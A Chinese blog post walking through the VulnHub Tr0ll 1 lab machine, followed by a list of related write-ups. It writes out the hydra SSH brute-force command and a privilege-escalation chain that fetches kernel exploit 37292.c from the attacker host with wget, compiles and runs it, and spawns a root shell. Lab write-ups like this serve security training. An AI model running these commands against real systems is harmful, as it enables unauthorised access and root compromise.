小白的靶机-VulnHub-Tr0ll

最新推荐文章于 2021-11-30 01:39:22 发布
最新推荐文章于 2021-11-30 01:39:22 发布
阅读量155 收藏
点赞数
分类专栏: 小白的靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo41ge/article/details/110970775
版权

靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/

信息收集

在这里插入图片描述
在这里插入图片描述

我们可以在上面看到Nmap找到开放的端口21、22、80

Anonymous FTP login allowed
//允许匿名FTP登录 

用户名:Anonymous
密码为空

其中暴露的robots.txt/secret目录

攻击

根据Nmap的结果 进行攻击

在这里插入图片描述pcap后缀的文件 盲猜是流量分析

将文件下载到本地使用Wireshark打开查看

在这里插入图片描述耶 有收获 发现一个目录

进行访问 目录

在这里插入图片描述
在这里插入图片描述
继续浏览/secret

在这里插入图片描述啊这 就这啊

尝试着打开/sup3rs3cr3tdirlol目录

在这里插入图片描述

下载下来

file roflmao //检查文件类型

在这里插入图片描述它是32位ELF可执行文件,使用strings字符串对其执行一些静态分析

在这里插入图片描述
Find address 0x0856BF to proceed意思是找到地址0x0856BF

在这里插入图片描述上面应该是用户名 下面是密码

在这里插入图片描述在这里插入图片描述
将用户名文件下载下来

在这里插入图片描述

在这里插入图片描述ok
上神器九头蛇 破解一下

hydra -L which_one_lol.txt -p Pass.txt 192.168.120.131 ssh

在这里插入图片描述

ssh登陆查看信息

在这里插入图片描述
知道了靶机的版本 看有没有 漏洞

提权

在exploit官网查看可以使用37292进行提权

之前 用过了 所以我就拿出来继续打

使用python创建一个服务

python -m SimpleHTTPServer 5555

通过服务上传37292.c到靶机中

使用python获得的shell权限后,得使用ptyhon获得tty,使用

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
轻车熟路的打一套组合拳 爽

这台靶机你们会遇到登陆ssh overflow@192.168.145.149后会2分钟就自动断开会话超时,然后得重新连接 我淦 贼烦 我刚开始以为是自己的问题

会话自动断开,原因可能是设置了计划任务

先 来 get一波 手速 快速打一波

python -c 'import pty; pty.spawn("/bin/bash")'

cd /tmp
 
wget 192.168.120.130:5555/37292.c

gcc 37292.c -o kk

./kk

id

cd /root

ls

cat proof.txt

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

还有一种 其他的提权方法 。。。 没看懂 就不写了

参考博客:https://blog.csdn.net/qq_34801745/article/details/103764969

每天都要努力哇
关注
专栏目录
VulnHub-Tr0ll1靶机实战
千寻的博客
01-12 608
靶机下载地址 https://www.vulnhub.com/entry/tr0ll-1,100/ 环境: Vmware 15.5 靶机地址:192.168.246.128 kali地址:192.168.246.131 第一部分 信息收集 第一步 进行端口扫描,去发现存活主机,发现主机开放21、22、80端口 namp -sP 192.168.246.0/24 nmap -sS -sV -TS -A -P- 192.168.246.131 第二步 访问80端口 第三步 只能
Pentest Lab - Tr0ll
Nixawk
09-12 3475
[Download]: http://vulnhub.com/entry/tr0ll-1,100/ <
vulhubTr0ll-1
qq_38618396的博客
09-12 454
0x00 基本信息 下载地址: Download: http://overflowsecurity.com/files/Tr0ll.rar Download (Mirror): https://download.vulnhub.com/tr0ll/Tr0ll.rar Download (Torrent): https://download.vulnhub.com/tr0ll/Tr0ll.rar.torrent ( Magnet) 描述: Tr0ll was inspired by the constan
tr0ll靶机渗透
weixin_43070384的博客
06-19 753
. 发现目标靶机IP地址,然后可以得出目标网站的IP地址,所以通过IP地址登陆网站。 nmap -sP 192.168.xxx.0/24 2. 得到目标靶机的ip地址后,用浏览器登陆目标IP,发现是一张图片! 3. 然后我们遍历目录,查找敏感路径。 4. 通过遇见扫描出地址登陆 robots.txt 5.登陆192.168.111.131/secret/index.html(本能应激登陆) 6.扫服务发现开启了ftp服务 7.已知ftp服务打开了,所以干他娘的,二营长把我的意大利炮抬出来...
oscp——Tr0ll: 1
王嘟嘟的博客
03-12 353
# 0x00 目标资料 ## 链接 https://www.vulnhub.com/entry/tr0ll-1,100/ ## 难度推荐 5 - 思路 2 - Web80——UserShell 2 - UserShell——Rootshel 1 ## 环境搭建 - VM...
小白靶机-VulnHub-Lampiao
wo41ge的博客
12-08 287
靶机地址,看这里 一、信息收集 我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址: 关于nmap的入门操作 nmap -sP 192.168.86.0/24 或者使用netdiscover获取目标IP地址 我们就拿到了这次靶机的IP地址:192.168.86.160 开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描: nmap -sS -sV -T5 -A -p- 192.168.86.160 目标计算机上
小白靶机-VulnHub-IMF
wo41ge的博客
12-24 339
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 目标:得到root权限&找到四个flag.txt 开机界面就是个这 确定靶机地址:192.168.86.172 发现80端口 运行着Apache 直接上页面康康 这个选项 右键源代码发现flag1 flag1{YWxsdGhlZmlsZXM=} 发现这是一个base64的加密 进行解码 allthefiles 还有一个base64加密的标签 解码康康 这里有一个坑 他们三个 是连在一起的 只有
小白靶机-VulnHub-GoldenEye
wo41ge的博客
12-10 362
靶机地址 看这里 这里注意:需要将攻击机kali和靶机同设置为仅主机状态下 信息收集 使用nmap获取目标IP地址 nmap -sP 192.168.120.0/24 ip地址就是这个了:192.168.120.129 或者netdiscover 都可以 找出目标计算机上可用的开放端口和一些服务 //在目标计算机上启动nmap全端口T5速度扫描: nmap -sS -sV -T5 -A -p- 192.168.120.129 目标计算机上有四个可用的开放端口 由于目标计算机上的端口80可
小白靶机-VulnHub-DerpNStink
wo41ge的博客
12-17 309
继续 继续 淦靶机 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt ok 开始操作了 开机界面就是个这 轻车熟路 的搞一下 找到了此次CTF目标计算机IP地址:192.168.120.136 综合信息 21端口--FTP 22端口--SSH 80端口--HTTP 优先看看80端口 直接访问 F12找一找 作者可太行了 这不就有了吗 flag1=52E37291AEDF6A46D7D
ubuntu本地内核提权37292.c
08-06
ubuntu本地内核提权
小白靶机-VulnHub-W1R3S
wo41ge的博客
12-14 351
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 开机界面 就是个这 确定靶机地址:192.168.120.134 使用namp进行全盘扫面 开放了21,22,80,3306端口 80端口 竟然在 那就上web页面呗 翻了半天 每个锤子东西 使用dirb工具攻击目录 命令:dirb http://192.168.120.134 找到了几个重要的目录,/administrator、/insta
Billu_b0x 靶机 write up任意文件下载 审计出文件包含页面(特定参数)+头像上传图片马getshell 37292内核漏洞提权
YouthBelief的博客
11-30 1856
Billu_b0x 靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘0x03 获取shell0x04 提权0x05 思路总结 0x00 环境搭建 下载链接 https://download.vulnhub.com/billu/Billu_b0x.zip nat模式 0x01 信息收集 IP探测 netdiscover -i eth0 -r 192.168.157.0/24 端口探测 masscan -p 1-65535 --rate 1000 192.168.157.
linux内核提权,WEB安全第六章提权篇01 LINUX 内核漏洞提权
weixin_35203943的博客
04-29 193
WEB安全第六章提权篇01 LINUX 内核漏洞提权1、简介通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache 就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限 超级管理员权限。2、创建交互shelllinux 提权 需要交互s...
Linux提权————Linux下三种不同方式的提权技巧
Fly_鹏程万里
05-16 3995
在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到获取到低权限SHELL后我们通常做下面几件事1.检测操作系统的发...
小白靶机VulnHub-Pinky‘s Palace: v3
热门推荐
wo41ge的博客
02-19 1万+
靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/ 开机界面 就是这样 确定了靶机的IP地址:192.168.106.150 靶机开放了21、5555、8000端口 一个一个来 21端口 ftp服务可以匿名访问 5555端口有ssh服务 8000端口有http服务 运行了Drupal 打开康康 让我们尽量不要使用metasploit工具 kali上ftp匿名登录 去底层 康康 匿名登录 就是 账号:ftp 密码:空 这边遇到一个问题
小白靶机VulnHub-SolidState
wo41ge的博客
02-18 1万+
靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/ 开机界面就是这样 拿到靶机的IP地址:192.168.106.151 可以看到的靶机开放了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(james-admin) 这里有一个漏洞:JAMES Remote Admin 2.3.2存在漏洞 具体可以看这里 那我们就直接去4555端口 因为是Remote Admin Service 所以我们上nc连
小白靶机VulnHub-Wallaby‘s: Nightmare (v1.0.2)
wo41ge的博客
02-13 1万+
靶机地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 开机界面就是这样 还是 采用的桥接模式 确定靶机的IP地址:192.168.1.10 靶机开放了22、80端口 直接访问 随意输入一个用户名 看这个参数 /?page= 之前总结过 直接/etc/passwd 上nikto扫扫 被拒绝了请求 我淦 重新扫描一下 发现80端口关闭了。。。 但是60080端口开启了http服务 继续扫目录 有很多的目录 一个一个看一下
小白靶机VulnHub-Web Developer
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
vulnhub靶机-jangow: 1.0.1
最新发布
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值